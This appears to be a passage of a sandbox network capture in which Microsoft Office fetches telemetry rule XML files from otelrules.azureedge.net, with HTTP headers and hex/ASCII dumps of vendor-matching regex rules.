                                                  2024-10-13 17:34:23 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  72192.168.2.44983613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 479
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                  ETag: "0x8DC582BB7D702D0"
                                                  x-ms-request-id: 5aec4ebb-b01e-0002-57ca-1a1b8f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cfvzwz27u5rnq9kpc00000005gg000000008ef6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  73192.168.2.44983813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 425
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                  ETag: "0x8DC582BBA25094F"
                                                  x-ms-request-id: 0fbb1da2-e01e-0085-1521-1cc311000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cfbd7pgux3k6qfa60000000042g00000000bm3g
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  74192.168.2.44984013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 448
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB389F49B"
                                                  x-ms-request-id: 355a979e-401e-0064-3e4a-1c54af000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cf9wwz8ehu7c5p33g00000002h0000000005gca
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  75192.168.2.44983913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 475
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                  ETag: "0x8DC582BB2BE84FD"
                                                  x-ms-request-id: b2260943-f01e-0052-0b1c-1c9224000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cfvq8pt2ak3arkg6n000000032000000000ma3m
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  76192.168.2.44984113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 491
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B98B88612"
                                                  x-ms-request-id: 9ba87e07-d01e-008e-2ae9-1a387a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cfvq8pt2ak3arkg6n000000033000000000fxau
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  77192.168.2.44984213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 416
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                  ETag: "0x8DC582BAEA4B445"
                                                  x-ms-request-id: 06589d36-d01e-0065-18bf-1ab77a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cfbd7pgux3k6qfa60000000043g0000000084nv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  78192.168.2.44984413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:24 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:24 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:24 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                  ETag: "0x8DC582BA80D96A1"
                                                  x-ms-request-id: fe0e2196-001e-0079-5547-1c12e8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173424Z-17db6f7c8cfpm9w8b1ybgtytds000000035g0000000073wa
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:24 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  79192.168.2.44984313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:24 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:24 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:24 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 479
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B989EE75B"
                                                  x-ms-request-id: 4508f1f3-f01e-0096-78e2-1a10ef000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173424Z-17db6f7c8cfbr2wt66emzt78g400000004r000000000amtq
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:24 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  80192.168.2.44984513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:24 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:24 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:24 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                  ETag: "0x8DC582B97E6FCDD"
                                                  x-ms-request-id: 24993946-c01e-008e-55d7-1a7381000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173424Z-17db6f7c8cf4g2pjavqhm24vp400000005c000000000cgbf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:24 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  81192.168.2.44984613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:24 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:24 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:24 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                  ETag: "0x8DC582B9C710B28"
                                                  x-ms-request-id: 5d72a51a-801e-008f-7fe1-1a2c5d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173424Z-17db6f7c8cfqxt4wrzg7st2fm8000000056000000000m4xh
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  82192.168.2.44984713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:24 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:24 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:24 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                  ETag: "0x8DC582BA54DCC28"
                                                  x-ms-request-id: bf053e75-701e-000d-6f20-1b6de3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173424Z-17db6f7c8cfbd7pgux3k6qfa60000000045g000000003pk5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
